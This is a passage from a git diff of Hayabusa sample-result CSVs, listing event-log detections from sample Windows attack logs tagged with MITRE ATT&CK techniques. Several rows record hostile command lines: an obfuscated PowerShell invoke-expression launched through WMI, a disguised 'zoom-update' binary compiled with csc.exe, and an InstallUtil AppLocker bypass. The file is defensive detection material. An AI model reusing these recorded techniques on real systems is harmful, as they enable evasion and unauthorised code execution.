C:\Windows\System32\spoolsv.exe",rules/hayabusa/sysmon/alerts/1_ProcessCreationSysmonAlert.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0004-Privilege Escalation/T1574-DLL side-loading/1-Print spool spawned a CMD shell (PrintNightMare).evtx -2021-10-28 
22:41:21.325 +09:00,FS03.offsec.lan,1,high,Abused Debug Privilege by Arbitrary Parent Processes,,rules/sigma/process_creation/sysmon_abusing_debug_privilege.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0004-Privilege Escalation/T1574-DLL side-loading/1-Print spool spawned a CMD shell (PrintNightMare).evtx -2021-11-02 23:15:23.676 +09:00,fs03vuln.offsec.lan,1102,high,Security log was cleared,User: admmig,rules/hayabusa/default/alerts/Security/1102_IndicatorRemovalOnHost-ClearWindowsEventLogs_SecurityLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1140-Deobfuscate-Decode Files or Information/ID4688-Certutil download.evtx -2021-11-09 00:01:27.604 +09:00,fs03vuln.offsec.lan,1,high,Process Creation Sysmon Rule Alert,"Rule: technique_id=T1086,technique_name=PowerShell : Command: powershell $env:I4Pzl|.(Get-C`ommand ('{1}e{0}'-f'x','i')) : Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe : User: OFFSEC\admmig : Parent Command: C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding",rules/hayabusa/sysmon/alerts/1_ProcessCreationSysmonAlert.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID1-WMI spwaning PowerShell process - WMImplant.evtx -2021-11-09 00:01:27.604 +09:00,fs03vuln.offsec.lan,1,high,Wmiprvse Spawning Process,,rules/sigma/process_creation/win_wmiprvse_spawning_process.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID1-WMI spwaning PowerShell process - WMImplant.evtx -2021-11-09 00:01:27.604 +09:00,fs03vuln.offsec.lan,1,high,Suspicious PowerShell Parent Process,,rules/sigma/process_creation/win_susp_powershell_parent_process.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID1-WMI spwaning PowerShell process - WMImplant.evtx -2021-11-09 00:01:27.604 +09:00,fs03vuln.offsec.lan,1,low,Non Interactive 
PowerShell,,rules/sigma/process_creation/win_non_interactive_powershell.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID1-WMI spwaning PowerShell process - WMImplant.evtx -2021-11-09 00:01:27.604 +09:00,fs03vuln.offsec.lan,1,high,WMI Spawning Windows PowerShell,,rules/sigma/process_creation/win_wmi_spwns_powershell.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID1-WMI spwaning PowerShell process - WMImplant.evtx -2021-11-18 16:40:29.566 +09:00,PC-01.cybercat.local,1,high,Process Creation Sysmon Rule Alert,"Rule: technique_id=T1059,technique_name=Command-Line Interface : Command: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe /unsafe /nologo /target:exe /out:zoom-update.exe C:\Users\pc1-user\Desktop\zoom-update.cs : Path: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe : User: CYBERCAT\pc1-user : Parent Command: ""C:\Windows\system32\cmd.exe"" ",rules/hayabusa/sysmon/alerts/1_ProcessCreationSysmonAlert.yml,../hayabusa-sample-evtx/YamatoSecurity/T1027.004_Obfuscated Files or Information Compile After Delivery/sysmon.evtx -2021-11-18 16:42:54.822 +09:00,PC-01.cybercat.local,1,high,Process Creation Sysmon Rule Alert,"Rule: technique_id=T1218.004,technique_name=InstallUtil : Command: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe /logfile= /LogToConsole=false /U C:\Users\pc1-user\Desktop\zoom-update.exe : Path: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe : User: CYBERCAT\pc1-user : Parent Command: ""C:\Windows\system32\cmd.exe"" ",rules/hayabusa/sysmon/alerts/1_ProcessCreationSysmonAlert.yml,../hayabusa-sample-evtx/YamatoSecurity/T1218.004_Signed Binary Proxy Execution InstallUtil/sysmon.evtx -2021-11-18 16:42:54.822 +09:00,PC-01.cybercat.local,1,low,Possible Applocker Bypass,,rules/sigma/process_creation/win_possible_applocker_bypass.yml,../hayabusa-sample-evtx/YamatoSecurity/T1218.004_Signed Binary 
Proxy Execution InstallUtil/sysmon.evtx diff --git a/sample-results/hayabusa-sample-evtx-ResultsDeprecatedAndNoisyRulesEnabled.csv b/sample-results/hayabusa-sample-evtx-ResultsDeprecatedAndNoisyRulesEnabled.csv deleted file mode 100644 index 59d94e55..00000000 --- a/sample-results/hayabusa-sample-evtx-ResultsDeprecatedAndNoisyRulesEnabled.csv +++ /dev/null 
@@ -1,14207 +0,0 @@ -Timestamp,Computer,EventID,Level,RuleTitle,Details,RulePath,FilePath -2013-10-24 01:16:13.843 +09:00,37L4247D28-05,4624,informational,Logon Type 0 - System,Bootup,rules/hayabusa/default/events/Security/Logons/4624_LogonType-0-System.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx -2013-10-24 01:16:29.000 +09:00,37L4247D28-05,4625,medium,Failed Logon From Public IP,,rules/sigma/builtin/security/win_susp_failed_logon_source.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-application.evtx -2013-10-24 01:17:44.109 +09:00,37L4247D28-05,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx -2013-10-24 01:17:44.109 +09:00,37L4247D28-05,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx -2013-10-24 01:18:09.203 +09:00,37L4247D28-05,2003,low,USB Device Plugged,,rules/sigma/other/driverframeworks/win_usb_device_plugged.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx -2013-10-24 01:18:33.828 +09:00,IE8Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx -2013-10-24 01:18:33.828 +09:00,IE8Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx -2013-10-24 01:18:50.500 +09:00,IE8Win7,4624,informational,Logon Type 0 - System,Bootup,rules/hayabusa/default/events/Security/Logons/4624_LogonType-0-System.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx -2013-10-24 01:21:30.000 +09:00,IE8Win7,4625,medium,Failed Logon From Public 
IP,,rules/sigma/builtin/security/win_susp_failed_logon_source.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-application.evtx -2013-10-24 01:21:33.630 +09:00,IE8Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx -2013-10-24 01:21:33.630 +09:00,IE8Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx -2013-10-24 01:21:33.630 +09:00,IE8Win7,4616,medium,Unauthorized System Time Modification,,rules/sigma/builtin/security/win_susp_time_modification.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx -2013-10-24 01:22:39.911 +09:00,IE8Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx -2013-10-24 01:22:39.911 +09:00,IE8Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx -2013-10-24 01:22:39.911 +09:00,IE8Win7,4616,medium,Unauthorized System Time Modification,,rules/sigma/builtin/security/win_susp_time_modification.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx -2013-10-24 01:22:39.973 +09:00,IE8Win7,4720,medium,Local user account created,User: IEUser : SID:S-1-5-21-3463664321-2923530833-3546627382-1000,rules/hayabusa/default/alerts/Security/4720_CreateAccount-LocalAccount_UserAccountCreated.yml,../hayabusa-sample-evtx/DeepBlueCLI/new-user-security.evtx -2013-10-24 01:22:39.973 +09:00,IE8Win7,4720,medium,Local user account created,User: IEUser : 
SID:S-1-5-21-3463664321-2923530833-3546627382-1000,rules/hayabusa/default/alerts/Security/4720_CreateAccount-LocalAccount_UserAccountCreated.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx -2013-10-24 01:22:40.004 +09:00,IE8Win7,4732,high,User added to local Administrators group,User: - : SID: S-1-5-21-3463664321-2923530833-3546627382-1000 : Group: Administrators,rules/hayabusa/default/alerts/Security/4732-AccountManipulation_UserAddedToLocalAdministratorsGroup.yml,../hayabusa-sample-evtx/DeepBlueCLI/new-user-security.evtx -2013-10-24 01:22:40.004 +09:00,IE8Win7,4732,high,User added to local Administrators group,User: - : SID: S-1-5-21-3463664321-2923530833-3546627382-1000 : Group: Administrators,rules/hayabusa/default/alerts/Security/4732-AccountManipulation_UserAddedToLocalAdministratorsGroup.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx -2013-10-24 01:22:40.005 +09:00,IE8Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx -2013-10-24 01:22:40.005 +09:00,IE8Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx -2013-10-24 01:22:44.979 +09:00,IE8Win7,4648,informational,Explicit Logon,Source User: WIN-QALA5Q3KJ43$ : Target User: IEUser : IP Address: 127.0.0.1 : Process: C:\Windows\System32\winlogon.exe : Target Server: localhost,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx -2013-10-24 01:22:44.979 +09:00,IE8Win7,4624,informational,Logon Type 2 - Interactive,User: IEUser : Workstation: WIN-QALA5Q3KJ43 : IP Address: 127.0.0.1 : Port: 0 : LogonID: 0x298c5 : (Warning: Credentials are stored in 
memory),rules/hayabusa/default/events/Security/Logons/4624_LogonType-2-Interactive.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx -2013-10-24 01:22:44.979 +09:00,IE8Win7,4624,informational,Logon Type 2 - Interactive,User: IEUser : Workstation: WIN-QALA5Q3KJ43 : IP Address: 127.0.0.1 : Port: 0 : LogonID: 0x29908 : (Warning: Credentials are stored in memory),rules/hayabusa/default/events/Security/Logons/4624_LogonType-2-Interactive.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx -2013-10-24 01:22:44.979 +09:00,IE8Win7,4672,informational,Admin Logon,User: IEUser : LogonID: 0x298c5,rules/hayabusa/default/events/Security/Logons/4672_AdminLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx -2013-10-24 01:23:39.000 +09:00,IE8Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-application.evtx -2013-10-24 01:23:39.000 +09:00,IE8Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-application.evtx -2013-10-24 01:24:00.130 +09:00,IE8Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx -2013-10-24 01:24:00.130 +09:00,IE8Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx -2013-10-24 01:24:00.161 +09:00,IE8Win7,4616,medium,Unauthorized System Time Modification,,rules/sigma/builtin/security/win_susp_time_modification.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx -2013-10-24 01:24:53.630 +09:00,IE8Win7,9,medium,Raw Disk Access Using Illegitimate 
Tools,,rules/sigma/raw_access_thread/sysmon_raw_disk_access_using_illegitimate_tools.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx -2013-10-24 01:27:48.911 +09:00,IE8Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx -2013-10-24 01:27:48.911 +09:00,IE8Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx -2013-10-24 01:28:54.348 +09:00,IE8Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx -2013-10-24 01:28:54.348 +09:00,IE8Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx -2013-10-24 01:32:51.504 +09:00,IE8Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx -2013-10-24 02:05:04.489 +09:00,IE8Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx -2013-10-24 02:27:21.754 +09:00,IE8Win7,4647,informational,Logoff - User Initiated,User: IEUser : LogonID: 0x29908,rules/hayabusa/default/events/Security/Logons/4647_LogoffUserInitiated.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx -2013-10-24 02:27:37.645 +09:00,IE8Win7,21,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx -2013-10-24 02:30:47.140 +09:00,IE8Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx -2013-10-24 02:30:47.140 
+09:00,IE8Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx -2013-10-24 02:30:52.625 +09:00,IE8Win7,4624,informational,Logon Type 0 - System,Bootup,rules/hayabusa/default/events/Security/Logons/4624_LogonType-0-System.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx -2013-10-24 02:30:58.000 +09:00,IE8Win7,4625,medium,Failed Logon From Public IP,,rules/sigma/builtin/security/win_susp_failed_logon_source.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-application.evtx -2013-10-24 02:31:10.741 +09:00,IE8Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx -2013-10-24 02:31:10.741 +09:00,IE8Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx -2013-10-24 02:31:10.741 +09:00,IE8Win7,4616,medium,Unauthorized System Time Modification,,rules/sigma/builtin/security/win_susp_time_modification.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx -2013-10-24 02:32:53.796 +09:00,IE8Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx -2013-10-24 02:32:53.796 +09:00,IE8Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx -2013-10-24 02:33:10.078 +09:00,IE8Win7,4624,informational,Logon Type 0 - System,Bootup,rules/hayabusa/default/events/Security/Logons/4624_LogonType-0-System.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx -2013-10-24 02:33:18.000 +09:00,IE8Win7,4625,medium,Failed Logon From Public 
IP,,rules/sigma/builtin/security/win_susp_failed_logon_source.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-application.evtx -2013-10-24 02:33:31.593 +09:00,IE8Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx -2013-10-24 02:33:31.593 +09:00,IE8Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx -2013-10-24 02:33:31.593 +09:00,IE8Win7,4616,medium,Unauthorized System Time Modification,,rules/sigma/builtin/security/win_susp_time_modification.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx -2013-10-24 02:35:55.000 +09:00,IE8Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-application.evtx -2013-10-24 02:35:55.000 +09:00,IE8Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-application.evtx -2013-10-24 02:36:53.671 +09:00,IE8Win7,4648,informational,Explicit Logon,Source User: IE8WIN7$ : Target User: IEUser : IP Address: 127.0.0.1 : Process: C:\Windows\System32\winlogon.exe : Target Server: localhost,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx -2013-10-24 02:36:53.671 +09:00,IE8Win7,4624,informational,Logon Type 2 - Interactive,User: IEUser : Workstation: IE8WIN7 : IP Address: 127.0.0.1 : Port: 0 : LogonID: 0x57d5b : (Warning: Credentials are stored in memory),rules/hayabusa/default/events/Security/Logons/4624_LogonType-2-Interactive.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx -2013-10-24 02:36:53.671 +09:00,IE8Win7,4624,informational,Logon Type 2 - Interactive,User: 
IEUser : Workstation: IE8WIN7 : IP Address: 127.0.0.1 : Port: 0 : LogonID: 0x57d8d : (Warning: Credentials are stored in memory),rules/hayabusa/default/events/Security/Logons/4624_LogonType-2-Interactive.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx -2013-10-24 02:36:53.671 +09:00,IE8Win7,4672,informational,Admin Logon,User: IEUser : LogonID: 0x57d5b,rules/hayabusa/default/events/Security/Logons/4672_AdminLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx -2013-10-24 02:38:42.499 +09:00,IE8Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx -2013-10-24 02:45:29.131 +09:00,IE8Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx -2013-10-24 02:45:29.131 +09:00,IE8Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx -2013-10-24 02:45:29.131 +09:00,IE8Win7,4616,medium,Unauthorized System Time Modification,,rules/sigma/builtin/security/win_susp_time_modification.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx -2013-10-24 02:45:31.256 +09:00,IE8Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx -2013-10-24 02:45:31.256 +09:00,IE8Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx -2013-10-24 02:45:31.256 +09:00,IE8Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx -2013-10-24 02:45:31.256 +09:00,IE8Win7,19,high,WMI Event 
Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx -2013-10-24 02:45:31.256 +09:00,IE8Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx -2013-10-24 02:45:31.256 +09:00,IE8Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx -2013-10-24 02:45:31.256 +09:00,IE8Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx -2013-10-24 02:45:31.256 +09:00,IE8Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx -2013-10-24 02:45:31.256 +09:00,IE8Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx -2013-10-24 02:45:31.256 +09:00,IE8Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx -2013-10-24 02:45:31.256 +09:00,IE8Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx -2013-10-24 02:45:31.256 +09:00,IE8Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx -2013-10-24 02:45:31.256 +09:00,IE8Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx -2013-10-24 02:45:31.256 +09:00,IE8Win7,19,high,WMI Event 
Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx -2013-10-24 02:45:31.256 +09:00,IE8Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx -2013-10-24 02:45:31.256 +09:00,IE8Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx -2013-10-24 02:45:31.256 +09:00,IE8Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx -2013-10-24 02:45:31.256 +09:00,IE8Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx -2013-10-24 02:45:31.256 +09:00,IE8Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx -2013-10-24 02:45:31.256 +09:00,IE8Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx -2013-10-24 02:45:31.256 +09:00,IE8Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx -2013-10-24 02:45:31.256 +09:00,IE8Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx -2013-10-24 02:45:31.256 +09:00,IE8Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx -2013-10-24 02:45:31.256 +09:00,IE8Win7,19,high,WMI Event 
Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx -2013-10-24 02:45:31.256 +09:00,IE8Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx -2013-10-24 02:45:31.256 +09:00,IE8Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx -2013-10-24 02:45:31.256 +09:00,IE8Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx -2013-10-24 02:45:31.256 +09:00,IE8Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx -2013-10-24 02:45:31.256 +09:00,IE8Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx -2013-10-24 02:45:31.256 +09:00,IE8Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx -2013-10-24 02:45:31.256 +09:00,IE8Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx -2013-10-24 02:45:31.256 +09:00,IE8Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx -2013-10-24 02:45:31.256 +09:00,IE8Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx -2013-10-24 02:45:31.256 +09:00,IE8Win7,19,high,WMI Event 
Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx -2013-10-24 02:45:31.256 +09:00,IE8Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx -2013-10-24 02:45:31.256 +09:00,IE8Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx -2013-10-24 02:45:31.256 +09:00,IE8Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx -2013-10-24 02:45:31.256 +09:00,IE8Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx -2013-10-24 02:45:31.256 +09:00,IE8Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx -2013-10-24 02:45:31.256 +09:00,IE8Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx -2013-10-24 02:45:31.256 +09:00,IE8Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx -2013-10-24 02:45:31.256 +09:00,IE8Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx -2013-10-24 02:45:31.256 +09:00,IE8Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx -2013-10-24 02:45:31.256 +09:00,IE8Win7,19,high,WMI Event 
